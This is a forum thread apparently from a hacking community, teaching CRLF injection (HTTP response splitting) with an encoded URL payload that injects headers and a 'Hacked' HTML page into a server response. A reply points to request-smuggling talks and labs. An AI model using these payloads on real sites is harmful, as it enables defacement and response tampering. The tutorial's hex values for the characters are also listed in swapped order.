CRLF Injection - Manipulating an HTTP Request
#1
CRLF Injection - Manipulating an HTTP Request

Credits: RootTheSystem @ IntoSec

What Does CRLF Mean?It's shortened of "Carriage Return and Line Feed". These are the names of the characters we're going to inject.

Code [No Highlight]:

Carriage Return -> \r
Line Feed (New Line) -> \n

Looks familiar right?
When we push the Enter/Return button on our keyboard everytime, these characters been sending to proccessor for passing to a new line.

Extra Information: Equalivent of these characters in hexadecimal are 0A and 0D.

Exploitation
Now lets see an HTTP request.

Code:
GET http://www.tiggerwigger.com/index.php?param=val HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Host: www.tiggerwigger.com
This is a simple HTTP request with using GET method. We have a parameter that we can manipulate.

http://www.tiggerwigger.com/index.php?param=val

So if life gives us lemons, we'll make a lemonade.
Lets manipulate that piece of shit.

We'll inject a web response using CRLF characters, so the server will echo back our response. Then our web browser will act it as an actual response and show our index. Confused? Let me give an example for you.

Let's add our exploit to URL and see what happens.

http://www.tiggerwigger.com/index.php?param=val%0D%0AContent-Type:%20text/html%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0A%0D%0A<center><h1>Hacked</h1></center>%20HTTP/1.1

Now our request will be like this;
Code:
GET http://www.tiggerwigger.com/index.php?param=val%0D%0AContent-Type:%20text/html%0D%0AHTTP/1.1%20200%20OK%0D%0A
Content-Type:%20text/html%0D%0A%0D%0A<center><h1>Hacked</h1></center>%20HTTP/1.1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Host: www.tiggerwigger.com

And the server echoes it back to us..
Code:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Wed, 01 Jun 2011 14:59:30 GMT
Allow: GET
Connection: close

HTTP/1.1 200 OK
Content-Type: text/html

<center><h1>Hacked</h1></center> HTTP/1.1

Our browser treated our injected response like an actual response and BAM! Our index appeared in the page.

More info: https://owasp.org/www-community/vulnerab..._Injection
Reply
#2
This is a pretty rare attack, it died out like a decade ago. Though, request smuggling (something enabled by CRLF injection) has seen a revival in the past year. Though the form of HTTP Desync attacks, presented at last years Defcon and Blackhat conferences.

If you're looking for a more modern attack that can be used to do something similar, check it out.

- Defcon presentation: https://www.youtube.com/watch?v=w-eJM2Pc0KI
- Blackhat Slides: https://i.blackhat.com/USA-19/Wednesday/...t-Door.pdf
- Portswigger Academy Labs - https://portswigger.net/web-security/request-smuggling
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] Request header MySQL injection using netcat and burp suite Insider 0 1,554 06-16-2020, 02:53 AM
Last Post: Insider
  [SSI] Server-Side Includes Injection. [Tutorial] Insider 4 3,843 03-27-2020, 04:55 PM
Last Post: Insider
  Second Order SQL Injection Attacks thunder 1 2,506 05-20-2019, 01:06 PM
Last Post: Insider
  Re-posted and Updated [Complete MySQL Injection] Insider 5 14,310 04-28-2019, 09:46 PM
Last Post: thunder